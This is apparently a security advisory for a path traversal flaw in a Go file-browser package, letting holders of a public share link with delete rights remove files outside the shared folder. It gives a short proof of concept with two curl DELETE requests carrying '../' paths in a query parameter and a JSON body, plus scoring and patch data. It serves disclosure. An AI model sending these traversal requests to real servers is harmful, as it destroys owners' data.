Attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.
Two distinct vulnerable code paths:
DELETE /public/api/resources?hash=<hash>&path=../victimDELETE /public/api/resources/bulk?hash=<hash>1. Create a directory structure:
/folder/shared_subdir/ (shared)
/folder/protected.txt (outside shared directory)
2. Create a public share:
Path: /shared_subdir
AllowDelete=true
3. Send request:
curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"
#Observe:
#protected.txt is deleted despite being outside the shared directory
curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>" \
-H "Content-Type: application/json" \
-d '[{"path":"../protected.txt"}]'
poc_v3.sh (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)
An unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.
| Score | Percentile |
|---|---|
| 0.64% | 70.77% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 9.1 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-fwj3-42wh-8673 ↗ |
| CVE | CVE-2026-44542 ↗ |
| CWE id | Name |
|---|---|
| CWE-22 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| go | github.com/gtsteffaniak/filebrowser | < 0.0.0-20260501183844-112740bdd41d | 0.0.0-20260501183844-112740bdd41d | — |